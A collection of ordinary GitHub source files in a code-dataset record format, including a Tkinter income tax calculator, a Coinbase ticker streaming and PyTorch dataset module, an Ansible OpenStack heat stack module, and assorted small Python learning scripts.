(string.count('+') <= 1\r\n and string.count('-') <=1\r\n and string.count('.') <=1\r\n and result is not None\r\n and result.group(0) != \"\"))\r\n \r\n\r\n self.lblGrossAmt = Label(frame2, text='Gross Amount', font=('arial',10,'bold'), bd=12)\r\n self.lblGrossAmt.grid(row=0, column=0)\r\n validation = frame2.register(only_num)\r\n self.txtGrossAmt = Entry(frame2, textvariable=amt, validate=\"key\", validatecommand=(validation, '%P'), bg='light blue', font=('arial',10,'bold'), bd=12) # input field\r\n self.txtGrossAmt.focus()#set cursor at input field\r\n self.txtGrossAmt.grid(row=0, column=1)\r\n \r\n self.lblThreeDep = Label(frame2, text='Tax on 3 Deps', font=('arial',10,'bold'), bd=12)\r\n self.lblThreeDep.grid(row=1, column=0)\r\n self.txtThreeDep = Entry(frame2, textvariable=resultThreeDep, state=DISABLED, font=('arial',10,'bold'), bd=12) \r\n self.txtThreeDep.grid(row=1, column=1)\r\n \r\n self.lblTwoDep = Label(frame2, text='Tax on 2 Deps', font=('arial',10,'bold'), bd=12)\r\n self.lblTwoDep.grid(row=2, column=0)\r\n self.txtTwoDep = Entry(frame2, textvariable=resultTwoDep, state=DISABLED, font=('arial',10,'bold'), bd=12)\r\n self.txtTwoDep.grid(row=2, column=1)\r\n\r\n self.lblOneDep = Label(frame2, text='Tax on 1 Dep', font=('arial',10,'bold'), bd=12)\r\n self.lblOneDep.grid(row=3, column=0)\r\n self.txtOneDep = Entry(frame2, textvariable=resultOneDep, state=DISABLED, font=('arial',10,'bold'), bd=12)\r\n self.txtOneDep.grid(row=3, column=1)\r\n\r\n self.lblNilDep = Label(frame2, text='Tax on Nil Dep', font=('arial',10,'bold'), bd=12)\r\n self.lblNilDep.grid(row=4, column=0)\r\n self.txtNilDep = Entry(frame2, textvariable=resultNilDep, state=DISABLED, font=('arial',10,'bold'), bd=12)\r\n self.txtNilDep.grid(row=4, column=1)\r\n\r\n self.lblNilDep = Label(frame2, text='Tax on Non-Resident', font=('arial',10,'bold'), bd=12)\r\n self.lblNilDep.grid(row=5, column=0)\r\n self.txtNilDep = Entry(frame2, textvariable=resultNonRes, state=DISABLED, font=('arial',10,'bold'), bd=12)\r\n self.txtNilDep.grid(row=5, column=1)\r\n\r\n self.lblown = Label(frame3, text='Created by Steffny Marif Bill, 15 March 2019. To protect formulae, Dependent rebate is not included.', wraplength=255, font=('arial',9,'bold'), bd=10)\r\n self.lblown.grid(row=1, column=0, columnspan=2) #show creator info by spanning over the columns\r\n \r\n #==========================================================functions=====================================================================================\r\n \r\n def tax_amt():\r\n\r\n n1 = self.txtGrossAmt.get()\r\n n1 = float(n1)\r\n\r\n n = ((n1 * 26) - 200)\r\n tax = 0 \r\n \r\n\r\n if n <= 10000:\r\n tax = 0\r\n elif n >= 10001 and n <= 18000:\r\n tax = (n * 0.22 - 2200)/26\r\n elif n >= 18001 and n <= 33000:\r\n tax = (n * 0.3 - 3640)/26\r\n elif n >= 33001 and n <= 70000:\r\n tax = (n * 0.35 - 5290)/26\r\n elif n >= 70001 and n <= 250000:\r\n tax = (n * 0.4 - 8790)/26\r\n else:\r\n tax = (n * 0.42 - 13790)/26\r\n return tax\r\n\r\n def tax_amt_nonres():\r\n\r\n n2 = self.txtGrossAmt.get()\r\n n2 = float(n2)\r\n\r\n n3 = (n2 * 26)\r\n ntax = 0 \r\n \r\n\r\n if n3 <= 18000:\r\n ntax = (n3 * 0.22)/26\r\n elif n3 >= 18001 and n3 <= 33000:\r\n ntax = (n3 * 0.3 - 1440)/26\r\n elif n3 >= 33001 and n3 <= 70000:\r\n ntax = (n3 * 0.35 - 3090)/26\r\n elif n3 >= 70001 and n3 <= 250000:\r\n ntax = (n3 * 0.4 - 6590)/26\r\n else:\r\n ntax = (n3 * 0.42 - 11590)/26\r\n return ntax\r\n \r\n \r\n\r\n def dep_nil_rebate():\r\n\r\n rAmt1 = tax_amt()\r\n\r\n rAmt = rAmt1 * 26\r\n \r\n \r\n depRebate = 0\r\n \r\n if rAmt <= 0:\r\n depRebate = 0\r\n elif rAmt < 300:\r\n depRebate = (0 * 30) / 26\r\n elif rAmt > 3000:\r\n depRebate = (0 * 300) / 26\r\n else:\r\n depRebate = ((rAmt * 0) / 10) / 26\r\n return depRebate\r\n\r\n def net_tax_nil():\r\n\r\n inc = tax_amt()\r\n inc1 = inc\r\n\r\n d3 = dep_nil_rebate()\r\n dep = d3\r\n\r\n nettx = (inc1 - d3)\r\n\r\n nettax = 0\r\n \r\n if nettx < 0:\r\n nettax = 0\r\n else:\r\n nettax = nettx\r\n return nettax\r\n#================================================================================================================================================\r\n def cal_tax():\r\n\r\n inc = (amt.get())\r\n ginc = float(inc)\r\n\r\n tax1 = tax_amt()\r\n tax2 = (tax1)\r\n \r\n taxnonres = tax_amt_nonres()\r\n taxnon = (taxnonres)\r\n\r\n \r\n if isinstance(ginc, float):\r\n\r\n dep0con = net_tax_nil()\r\n dep0 = round(float(dep0con), 2)\r\n resultNilDep.set(dep0) #display dependent rebate in Nil dep field\r\n\r\n nonrescon = float(taxnon)\r\n nonres = round((nonrescon), 2)\r\n resultNonRes.set(nonres) #display dependent rebate in Non resident field\r\n return True\r\n \r\n \r\n \r\n#================================================================================================================================================\r\n #clear data in fields when reset button is clicked \r\n def reset():\r\n amt.set(\"\")\r\n resultThreeDep.set(\"\")\r\n resultTwoDep.set(\"\")\r\n resultOneDep.set(\"\")\r\n resultNilDep.set(\"\")\r\n resultNonRes.set(\"\")\r\n\r\n #close the app when exit button is clicked\r\n def wexit():\r\n close = tkinter.messagebox.askyesno(\"PNG Income Tax Calculator - 2012\", \"Do you want to exit?\")\r\n if close > 0:\r\n root.destroy()\r\n return \r\n \r\n #create the buttons and set the functions that each button will compute when clicked\r\n self.btnCal = Button(frame3, text='Calculate', font=('arial',10,'bold'), bd=10, pady=10, padx=10, width=6, command=cal_tax).grid(row=0,column=0)\r\n self.btnReset = Button(frame3, text='Reset', font=('arial',10,'bold'), bd=10, pady=10, padx=10, width=5, command=reset).grid(row=0,column=1)\r\n self.btnExit = Button(frame3, text='Exit', font=('arial',10,'bold'), bd=10, pady=10, padx=10, width=6, command=wexit).grid(row=0,column=2)\r\n \r\n\r\n\r\n\r\nif __name__=='__main__':\r\n root=Tk()\r\n app = CalTax(root)\r\n root.mainloop()\r\n\r\n \r\n","repo_name":"steffny1/Income-Tax-Calculator-_-Python-GUI","sub_path":"taxcal2012- Copy.py","file_name":"taxcal2012- Copy.py","file_ext":"py","file_size_in_byte":8489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13548914560","text":"#_*_coding:utf-8_*_\n\ndef cf():\n for i in range(1, 10):\n for j in range(1, 1+i):\n print('{}x{}={}\\t'.format(i, j, i*j), end='')\n\ndef dfh(num1, num2):\n a = num1 % num2\n b = (num1-1) / num2\n return b, a\n\nif __name__ == \"__main__\":\n cf()\n num2, num1 = dfh(9,4)\n tuple1 = dfh(9, 4)\n print(num1, num2)\n print(tuple1)\n\n for char in 'liangdianshui':\n print(char)","repo_name":"LoveAniuniu/python-learning","sub_path":"20190514/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33241812926","text":"# CSS 언어란???\n'''\n적용방법\n- 적용할 태그에 style 속성으로 넣기\n- HTML 문서 안에

QUIZ

'\n part_1 = '
'\n part_2 = '

'\n part_3 = '


0:\n model.add(tf.keras.layers.SpatialDropout3D(rec.dropout))\n rec_layer = tf.keras.layers.ConvLSTM2D(\n filters=rec.filters,\n kernel_size=rec.kernel_size,\n activation=rec.activation,\n recurrent_activation=rec.recurrent_activation,\n strides=rec.strides,\n bias_regularizer=rec.bias_reg,\n kernel_regularizer=rec.kernel_reg,\n activity_regularizer=rec.act_reg,\n return_sequences=index < len(self.rec) - 1,\n )\n model.add(rec_layer)\n if rec.normalization:\n model.add(tf.keras.layers.BatchNormalization())\n if rec.noise > 0:\n model.add(tf.keras.layers.GaussianNoise(rec.noise))\n\n create_flatten(self.flatten, model)\n create_deep(self.deep, model)\n\n model.add(tf.keras.layers.Dense(1))\n return model\n","repo_name":"Darono87/Hyperview_Challenge","sub_path":"creators/CLSTMCreator.py","file_name":"CLSTMCreator.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20253215085","text":"from turtle import Turtle\nMOVE_DISTANCE = 20\nUP = 90\nDOWN = 270\n\n\nclass Paddle(Turtle):\n def __init__(self, x, y):\n super().__init__()\n self.create(x, y)\n\n def create(self, x, y):\n self.shape('square')\n self.color('white')\n self.shapesize(stretch_wid=5, stretch_len=1)\n self.pu()\n self.goto(x, y)\n self.speed('fastest')\n\n def go_up(self):\n if self.ycor() < 275:\n new_y = self.ycor() + 20\n new_position = (self.xcor(), new_y)\n self.goto(new_position)\n\n\n def go_down(self):\n if self.ycor() > -275:\n new_y = self.ycor() - 20\n new_position = (self.xcor(), new_y)\n self.goto(new_position)","repo_name":"pearl178/pongGame","sub_path":"paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35172689376","text":"import argparse\nfrom datetime import datetime, timedelta\nfrom multiprocessing import Queue\n#from recordclass import recordclass\nimport collections\nimport pandas as pd\nimport numpy as np\nimport json\nimport cbpro\nimport time\nimport torch\nfrom torch.utils.data import Dataset, DataLoader, Sampler\n\n\nclass TickerStream:\n\n def __init__(self, products, source=None, window=600):\n self.products = products\n if source is None:\n self.stream = self.stream_tickers_live()\n elif isinstance(source, str):\n self.stream = self.stream_tickers(source)\n else:\n stream = (self.stream_tickers(path) for path in source)\n self.stream = (i for it in stream for i in it)\n self.window = window\n\n\n def stream_tickers_live(self, doraise=False):\n wsClient = TickerClient(products=self.products)\n wsClient.start()\n print(wsClient.url, wsClient.products)\n try:\n while True:\n if wsClient.queue.empty():\n time.sleep(1)\n else:\n yield wsClient.queue.get()\n except KeyboardInterrupt:\n wsClient.close()\n if doraise:\n raise KeyboardInterrupt\n #if wsClient.error:\n\n\n def stream_tickers(self, path):\n try:\n with open(path, 'r') as f:\n for l in f:\n msg = json.loads(l)\n if msg['type'] == 'ticker' and 'time' in msg:\n if self.products is None or msg['product_id'] in self.products:\n yield self.process_ticker_message(msg)\n except:\n print(f'could not stream tickers! (\"{path}\")')\n raise\n\n\n ticker_meta_keys = ('product_id', 'time')\n ticker_sample = collections.namedtuple('TickerSample',\n ticker_meta_keys + ('X', ))\n #ticker_feature_keys = ('high_24h', 'low_24h',\n ticker_feature_keys = ('best_ask', 'best_bid', 'high_24h', 'low_24h',\n 'open_24h', 'price', 'volume_24h', 'volume_30d')\n #ticker_feature_keys = ('high_24h', 'low_24h', 'price', 'volume_24h')\n #ticker_feature_keys = ('price', )\n ticker_feature_count = len(ticker_feature_keys)\n ticker_price_index = ticker_feature_keys.index('price')\n ticker_date_format = \"%Y-%m-%dT%H:%M:%S.%fZ\"\n\n def process_ticker_message(self, msg):\n msg['time'] = datetime.strptime(msg['time'], self.ticker_date_format)\n features = np.array([float(msg[key]) for key in self.ticker_feature_keys])\n meta = tuple(msg[key] for key in self.ticker_meta_keys) + (features, )\n return self.ticker_sample(*meta)\n\n\n def __iter__(self):\n stream = self.stream_batches(self.stream, self.products, self.window)\n queue = []\n for sample in stream:\n queue.append(sample)\n if len(queue) == self.window:\n snapshot = pd.DataFrame.from_records(queue,\n columns=tickers.batch_sample._fields)\n yield (self._collate(snapshot), snapshot.iloc[-1].prices)\n queue.pop(0)\n\n\n @staticmethod\n @torch.no_grad()\n def _collate(snapshot):\n frames = []\n for i, snap in enumerate(snapshot.itertuples(index=False)):\n fs = snap.features\n frames.append((fs - fs.mean()) / fs.std())\n frames = np.array([frames])\n frames = torch.FloatTensor(frames).transpose(0, 1)\n return frames\n\n\n batch_meta_keys = ('time', 'mass', 'purity', 'Y', 'edge')\n batch_sample = collections.namedtuple('Sample', batch_meta_keys + ('X', ))\n\n\n def tickers_df(self):\n return pd.DataFrame.from_records(self.stream_batches(),\n columns=self.batch_sample._fields)\n\n\n def stream_batches(self):\n zero = lambda : np.zeros(len(self.ticker_feature_keys))\n self._cached = collections.defaultdict(zero)\n for time, batch in self.stream_buffer():\n if batch:\n batch_products = set(s.product_id for s in batch)\n mass = len(batch)\n purity = (len(batch_products) / len(self.products))\n prices, features = self.collate_ticker_samples(batch)\n yield self.batch_sample(time, mass, purity, prices, False, features)\n else:\n yield self.batch_sample(time, 0.0, 0.0, None, True, None)\n\n\n def collate_ticker_samples(self, batch):\n by_product_id = collections.defaultdict(list)\n for sample in batch:\n by_product_id[sample.product_id].append(sample.X)\n for product in self.products:\n if not by_product_id[product]:\n by_product_id[product].append(self._cached[product])\n product_features = [np.array(by_product_id[p]) for p in sorted(by_product_id)]\n product_features = [np.mean(pfs, axis=0) for pfs in product_features]\n prices = []\n g = zip(sorted(self.products), product_features)\n for j, (product, features) in enumerate(g):\n self._cached[product] = features\n prices.append(features[self.ticker_price_index])\n features = np.concatenate(product_features)\n return prices, features\n\n\n def stream_buffer(self):\n start = next(self.stream).time\n start = start - timedelta(\n seconds=start.second,\n microseconds=start.microsecond)\n buffer = []\n checkpoint = start + timedelta(seconds=self.window)\n for ticker in self.stream:\n if ticker.time > checkpoint:\n # TODO: do raise during inference and to loop restarting?\n #assert buffer\n yield checkpoint, buffer\n buffer = []\n checkpoint += timedelta(seconds=self.window)\n else:\n buffer.append(ticker)\n\n\nclass TickerClient(cbpro.WebsocketClient):\n\n def on_open(self):\n self.url = \"wss://ws-feed.pro.coinbase.com/\"\n self.channels = ['ticker']\n self.message_count = 0\n self.queue = Queue()\n\n\n def on_message(self, msg):\n self.message_count += 1\n self.queue.put(json.dumps(msg, sort_keys=True))\n\n\n def on_close(self):\n print(\"MessageCount = %i\" % self.message_count)\n print(\"-- Goodbye! --\")\n\n\n def on_error(self, *ags, **kws):\n super().on_error(*ags, **kws)\n self.stop = False\n\n\nclass TickerDataset(Dataset):\n \"\"\"Given an input time-series of feature vectors,\n approximate the gradient of a different output time-series of feature vectors.\n\n In context, the input time-series contains available live ticker data for a set\n of products (e.g. BTC-USD, ETH-USDC). The output time-series consists of price\n data for the same set of products. Thus this class is for approximating the\n direction of future price changes for a set of products given a recent history\n of ticker data about those products.\n\n Args:\n df (pd.DataFrame): Time-series where each entry has fields {time, X, Y}.\n window (int): How many recent frames (X) are used as the input time-series.\n stride (int): How many future frames (Y) are used as the output time-series.\n\n \"\"\"\n\n epsilon = 0.00001\n\n def __init__(self, df, window=6, stride=6):\n self.df = df\n self.window = window\n self.stride = stride\n\n\n def __getitem__(self, index):\n snapshot = self.df[index:index + self.window + self.stride]\n frames, targets = [], []\n for i, snap in enumerate(snapshot.itertuples(index=False)):\n if i < self.window:\n frames.append(snap.X)\n if i >= self.window - 1:\n targets.append(snap.Y)\n frames, targets = np.array(frames), np.array(targets)\n f_mean, f_std = frames.mean(axis=0), frames.std(axis=0)\n frames = np.array([((f - f_mean) / (f_std + self.epsilon)) for f in frames])\n #targets = 1 * (np.gradient(targets, axis=0).mean(axis=0) > 0)\n targets = 1 * (targets[-1] > targets[0])\n return frames, targets\n\n\n @torch.no_grad()\n def _collate(self, samples):\n frames, targets = zip(*samples)\n frames = torch.FloatTensor(frames).transpose(0, 1)\n targets = torch.LongTensor(targets).transpose(0, 1)\n return frames, targets\n\n\n def __len__(self):\n return self.df.shape[0] - self.window - self.stride\n\n\nclass TickerSampler(Sampler):\n\n def __init__(self, dataset, resample=False, products=None):\n self.ids = []\n self.bins = [[[] for x in range(2)] for product in products]\n print(len(dataset), dataset.df.shape)\n edgecount = 0\n for x in np.arange(len(dataset)):\n snapshot = dataset.df[x:x + dataset.window + dataset.stride]\n if not snapshot.edge.values.any():\n self.ids.append(x)\n inputs, targets = dataset[x]\n for y, target in enumerate(targets):\n self.bins[y][target.item()].append(x)\n else:\n edgecount += 1\n self.n_samples = len(self.ids)\n self._iteration = -1\n print(f'edges: {edgecount}')\n for product, bins in zip(products, self.bins):\n print(f'Product: {product}')\n for cls in range(len(bins)):\n print(f'cls: {cls}, cnt: {len(bins[cls])}')\n self.resample = resample\n\n\n def __iter__(self):\n self._iteration += 1\n rng = np.random.RandomState(self._iteration)\n if self.resample:\n n_samples_per_class = 10000\n pivot = 0\n bins = self.bins[pivot]\n index = []\n for target_bin in bins:\n chunk = rng.permutation(target_bin)\n chunk = chunk[:min(len(chunk), n_samples_per_class)]\n index.extend(chunk)\n else:\n index = self.ids\n return iter(rng.permutation(index))\n\n\n def __len__(self):\n return self.n_samples\n\n\nclass TickerDataLoader(DataLoader):\n\n def __init__(self, dataset, device=None, resample=False, products=None, **kws):\n sampler = TickerSampler(dataset, resample=resample, products=products)\n super().__init__(dataset,\n sampler=sampler,\n collate_fn=dataset._collate,\n **kws)\n if device is None:\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n self.device = device\n\n\n def __iter__(self):\n for batch, targets in super().__iter__():\n yield batch.to(self.device), targets.to(self.device)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n\t\tdescription='Utility for aggregating ticker data')\n parser.add_argument('--output', default='stream.log',\n help='Path to store ticker data')\n parser.add_argument('--products', default='products.txt',\n help='Path to list of targeted products')\n args = parser.parse_args()\n\n with open(args.products, 'r') as f:\n products = [l.strip() for l in f.readlines() if not l.startswith('#')]\n products = [l for l in products if l]\n\n with open(args.output, 'w') as f:\n for j, ticker in enumerate(stream_tickers_live(products=products)):\n f.write(f'{ticker}\\n')\n print(f'tickers: {j}', end='\\r')\n","repo_name":"ctogle/coind","sub_path":"coind/data/tickers.py","file_name":"tickers.py","file_ext":"py","file_size_in_byte":11507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22606857489","text":"from sqlalchemy import Table, or_\nfrom sqlalchemy.sql.functions import sum\n\nfrom common.database import db_connect\nfrom app.config.config import config\nfrom app.settings import env\nfrom model.notification import Notification\n# from model.article import Article\nfrom model.user import User\n\nengine, db_session, Base = db_connect()\n\n\nclass Praise(Base):\n __table__ = Table('praise', Base.metadata, autoload_with=engine)\n\n def calc_praised_num(self, aid):\n praised_num = db_session.query(sum(Praise.praised)).filter_by(aid=aid, praised=1, is_valid=1).first()\n # print(praised_num, type(praised_num))\n # print('點讚數:', praised_num[0])\n return praised_num[0]\n\n def update_status(self, uid, aid, praised=0):\n\n row = db_session.query(Praise).filter_by(\n uid=uid,\n aid=aid,\n is_valid=1\n ).first()\n\n if not row:\n praise = Praise(\n uid=uid,\n aid=aid,\n praised=praised\n )\n db_session.add(praise)\n else:\n row.praised = praised\n # article_row.praised = praised\n db_session.commit()\n # 計算獲讚數\n praised_num = self.calc_praised_num(aid)\n # print('點讚數:', int(praised_num))\n return praised_num\n\n def get_praise_status(self, uid, aid):\n praised = db_session.query(Praise.praised).filter_by(uid=uid, aid=aid).first()\n if not praised:\n return 0\n return praised[0]\n","repo_name":"ziliang-wang/buhuman","sub_path":"model/praise.py","file_name":"praise.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23131593090","text":"from terra_sdk.client import lcd\nfrom terra_sdk.core import coin\n\nimport anchorpy\nfrom anchorpy import exchange\n\nif __name__ == \"__main__\":\n CHAIN_ID = \"tequila-0004\"\n # CHAIN_ID = \"columbus-4\"\n LCD = lcd.LCDClient(\n chain_id=CHAIN_ID, url=anchorpy.settings.PUBLIC_NODE_URLS[CHAIN_ID]\n )\n\n print(\n f\"1 aUST = {anchorpy.coin_to_human_str(exchange.uaust_to_uusd(LCD, coin.Coin('uaust', 1e6)), decimals=8)}\" # noqa\n )\n print(\n f\"1 bLuna = {anchorpy.coin_to_human_str(exchange.ubluna_to_uusd(LCD, coin.Coin('ubluna', 1e6)), decimals=8)}\" # noqa\n )\n print(\n f\"1 ANC = {anchorpy.coin_to_human_str(exchange.uanc_to_uusd(LCD, coin.Coin('uanc', 1e6)), decimals=8)}\" # noqa\n )\n","repo_name":"Matthew-Jennings/anchorpy","sub_path":"scripts/print_rates.py","file_name":"print_rates.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"28398128894","text":"#!/usr/bin/python\n#coding: utf-8 -*-\n\ntry:\n import time\n from keystoneclient.v2_0 import client as ksclient\n from heatclient.client import Client as hclient\n from heatclient.common import template_utils\n from heatclient.common import utils\n from heatclient import exc\nexcept ImportError:\n print(\"failed=True msg='heatclient and keystoneclient is required'\")\n\nDOCUMENTATION = '''\n---\nmodule: os_stack\n - Create, update, list, show, delete and debug failure on heat stack deployment\noptions:\n login_username:\n description:\n - login username to authenticate to keystone\n required: true\n default: admin\n login_password:\n description:\n - Password of login user\n required: true\n default: True\n login_tenant_name:\n description:\n - The tenant name of the login user\n required: true\n default: True\n auth_url:\n description:\n - The keystone URL for authentication\n required: false\n default: 'http://127.0.0.1:35357/v2.0/'\n region_name:\n description:\n - Name of the region\n required: false\n default: None\n state:\n description:\n - Indicate desired state of the resource\n choices: ['create', 'update', 'list', 'show', 'delete', 'debug']\n default: present\n stack_name:\n description:\n - Name of the stack that should be created\n required: true\n default: None\n template:\n description:\n - Path of the template file to use for the stack creation\n required: false\n default: None\n environment_files:\n description:\n - List of environment files that should be used for the stack creation\n required: false\n default: None\nrequirements: [\"heatclient\", \"keystoneclient\"]\n'''\n\nEXAMPLES = '''\n# Create a stack with given template and environment files\n - name: create stack\n heat_stack:\n login_username: admin\n login_password: admin\n auth_url: \"http://192.168.1.14:5000/v2.0\"\n tenant_name: admin\n stack_name: test\n state: create\n template: \"/home/stack/ovb/templates/quintupleo.yaml\"\n environment_files: ['/home/stack/ovb/templates/resource-registry.yaml','/home/stack/ovb/templates/env.yaml']\n\n - name: delete stack\n heat_stack:\n stack_name: test\n state: delete\n login_username: admin\n login_password: admin\n auth_url: \"http://192.168.1.14:5000/v2.0\"\n tenant_name: admin\n'''\n\ndef obj_gen_to_dict(gen):\n \"\"\"Enumerate through generator of object and return lists of dictonaries.\n \"\"\"\n obj_list = []\n for obj in gen:\n obj_list.append(obj.to_dict())\n return obj_list\n\n\nclass Stack(object):\n\n def __init__(self, kwargs):\n self.client = self._get_client(kwargs)\n\n def _get_client(self, kwargs, endpoint_type='publicURL'):\n \"\"\" get heat client \"\"\"\n kclient = ksclient.Client(**kwargs)\n token = kclient.auth_token\n endpoint = kclient.service_catalog.url_for(service_type='orchestration',\n endpoint_type=endpoint_type)\n kwargs = {\n 'token': token,\n }\n return hclient('1', endpoint=endpoint, token=token)\n\n def create(self, name,\n template_file,\n env_file=None,\n format='json'):\n \"\"\" create heat stack with the given template and environment files \"\"\"\n self.client.format = format\n tpl_files, template = template_utils.get_template_contents(template_file)\n env_files, env = template_utils.process_multiple_environments_and_files(env_paths=env_file)\n\n try:\n stack = self.client.stacks.create(stack_name=name,\n template=template,\n environment=env,\n files=dict(list(tpl_files.items()) + list(env_files.items())),\n parameters={})\n uid = stack['stack']['id']\n\n stack = self.client.stacks.get(stack_id=uid).to_dict()\n while stack['stack_status'] == 'CREATE_IN_PROGRESS':\n stack = self.client.stacks.get(stack_id=uid).to_dict()\n time.sleep(5)\n if stack['stack_status'] == 'CREATE_COMPLETE':\n return stack\n else:\n return (False)\n except exc.HTTPBadRequest as e:\n return (False, e)\n\n def list(self):\n \"\"\" list created stacks \"\"\"\n fields = ['id', 'stack_name', 'stack_status', 'creation_time',\n 'updated_time']\n uids = []\n stacks = self.client.stacks.list()\n utils.print_list(stacks, fields)\n return obj_gen_to_dict(stacks)\n\n def delete(self, name):\n \"\"\" delete stack with the given name \"\"\"\n self.client.stacks.delete(name)\n return self.list()\n\n def get(self, name):\n \"\"\" show stack \"\"\"\n return self.client.stacks.get(name)\n\n def get_id(self, name):\n \"\"\" get stack id by name \"\"\"\n stacks = self.client.stacks.list()\n while True:\n try:\n stack = stacks.next()\n if name == stack.stack_name:\n return stack.id\n except StopIteration:\n break\n return False\n\nclass Resource(object):\n\n def __init__(self, kwargs):\n self.client = self._get_client(kwargs)\n\n def _get_client(self, kwargs, endpoint_type='publicURL'):\n \"\"\" get heat client \"\"\"\n kclient = ksclient.Client(**kwargs)\n token = kclient.auth_token\n endpoint = kclient.service_catalog.url_for(service_type='orchestration',\n endpoint_type=endpoint_type)\n kwargs = {\n 'token': token,\n }\n return hclient('1', endpoint=endpoint, token=token)\n\n def list(self, name):\n return [ res for res in self.client.resources.list(stack_id=name) ]\n\n def get(self, name, status='CREATE_COMPLETE', nested_depth=0):\n return [ res for res in self.client.resources.list(stack_id=name, nested_depth=nested_depth) if status in res.resource_status ]\n\n def get_software_deployment_by_id(self, id):\n try:\n deployment = self.client.software_deployments.get(id)\n return [(deployment.server_id, deployment.output_values['deploy_stderr'], deployment.status_reason)]\n except exc.HTTPNotFound:\n pass\n\n def get_software_deployment_by_status(self, status='FAILED'):\n return [ res for res in self.client.software_deployments.list() if status in res.resource_status ]\n\n def debug_deployment(self, name):\n # get failed resource\n failed_resource = self.get(name=name, status='FAILED', nested_depth=5)\n # get software_deployment\n failure = []\n for res in failed_resource:\n failure.append(self.get_software_deployment_by_id(res.physical_resource_id))\n return failure\n\n def debug_stack(self, name):\n # return all failed resources\n failed_resource = self.get(name=name, status='FAILED', nested_depth=5)\n return [ (res.resource_name, res.resource_status_reason, res.resource_type) for res in failed_resource ]\n\n\ndef main():\n argument_spec = openstack_argument_spec()\n argument_spec.update(dict(\n stack_name = dict(required=True),\n template = dict(default=None),\n environment_files = dict(default=None, type='list'),\n state = dict(default='create', choices=['create', 'update', 'delete', 'list', 'show', 'debug']),\n tenant_name = dict(default=None),\n timeout = dict(default=180),\n ))\n module = AnsibleModule(argument_spec=argument_spec)\n state = module.params['state']\n stack_name = module.params['stack_name']\n template = module.params['template']\n environment_files = module.params['environment_files']\n kwargs = {\n 'username': module.params['login_username'],\n 'password': module.params['login_password'],\n 'tenant_name': module.params['tenant_name'],\n 'auth_url': module.params['auth_url']\n }\n\n stack = Stack(kwargs)\n\n if module.params['state'] == 'create':\n stack_id = stack.get_id(stack_name)\n if not stack_id:\n stack = stack.create(name=stack_name,\n template_file=template,\n env_file=environment_files)\n if not stack[0]:\n module.fail_json(msg=\"Failed to create stack\", result = \"failed\")\n module.exit_json(changed = True, result = \"created\" , stack = stack)\n else:\n module.exit_json(changed = False, result = \"success\" , id = stack_id)\n elif module.params['state'] == 'update':\n module.exit_json(changed = False, result = \"Not implemented yet\")\n elif module.params['state'] == 'delete':\n stack_id = stack.get_id(stack_name)\n if not stack_id:\n module.exit_json(changed = False, result = \"success\")\n else:\n stack.delete(stack_name)\n module.exit_json(changed = True, result = \"deleted\")\n elif module.params['state'] == 'list':\n stack_list = stack.list()\n module.exit_json(changed = True, result = \"list\" , stack_list = stack_list)\n elif module.params['state'] == 'show':\n stack_show = stack.get(stack_name)\n module.exit_json(changed = True, result = \"show\" , stack_show = stack_show)\n elif module.params['state'] == 'debug':\n resource = Resource(kwargs)\n failed_resource = resource.debug_stack(stack_name)\n failed_deployment = resource.debug_deployment(stack_name)\n module.exit_json(changed = True, result = \"debug\" , failed_resource = failed_resource, failed_deployment = failed_deployment)\n\nfrom ansible.module_utils.basic import *\nfrom ansible.module_utils.openstack import *\nif __name__ == '__main__':\n main()\n","repo_name":"matbu/ansible-role-tripleo-heat-stack","sub_path":"library/os_stack.py","file_name":"os_stack.py","file_ext":"py","file_size_in_byte":10192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33898167546","text":"## _________________ numpy ___________________##\n\nimport numpy as np\n\n## EXAMPLE 1: complex number\n\ndef quad_real_roots(a, b, c):\n D = b**2 - 4*a*c\n x1 = (-b + D**0.5)/(2*a)\n x2 = (-b - D**0.5)/(2*a)\n return x1, x2\n\nprint(quad_real_roots(2, -1, -3))\n\ndef quad_complex_roots(aR, bR, cR):\n a = np.complex(aR,0)\n b = np.complex(bR,0)\n c = np.complex(cR, 0)\n D = b ** 2 - 4 * a * c\n x1 = (-b + np.sqrt(D))/(2*a)\n x2 = (-b - np.sqrt(D))/(2*a)\n return x1, x2\n\nprint(quad_complex_roots(1, 2, 5))\n\n\n## EXAMPLE 2: arrays\nm1 = 0.5\nb1 = 0.5\nm2 = -1\nb2 = 2\n\nA = np.array([[-m1, 1], [-m2, 1]]) # 注意整个数列外面有一个[]\nb = np.array([[b1], [b2]])\nprint(A)\nprint(np.shape(A)) # 查看数列形式\n\nA_inv = np.linalg.inv(A) # 求逆矩阵\nprint(A_inv)\n\nX = np.dot(A_inv, b) # 矩阵相乘\nprint(X)\n\n\n## _________________ matplotlib ___________________##\n\nimport matplotlib.pyplot as plt\nx_1 = np.linspace(-2, 6, 11) # 生成随机数(起,止,数量)\nprint(x_1)\ny_1 = m1*x_1 + b1\n\nx_2 = x_1\ny_2 = m2*x_2 + b2\n\nplt.plot(x_1, y_1, color = 'magenta', linewidth = 3)\nplt.plot(x_2, y_2)\n\nplt.legend(['y = 0.5x+0.5 ', 'y=-x+2'])\nplt.grid()\nplt.show()\n\n\n","repo_name":"Wenfei-Shen/Python2020","sub_path":"Class Note 4.py","file_name":"Class Note 4.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18045152796","text":"# Back End Packages\nimport json\nfrom 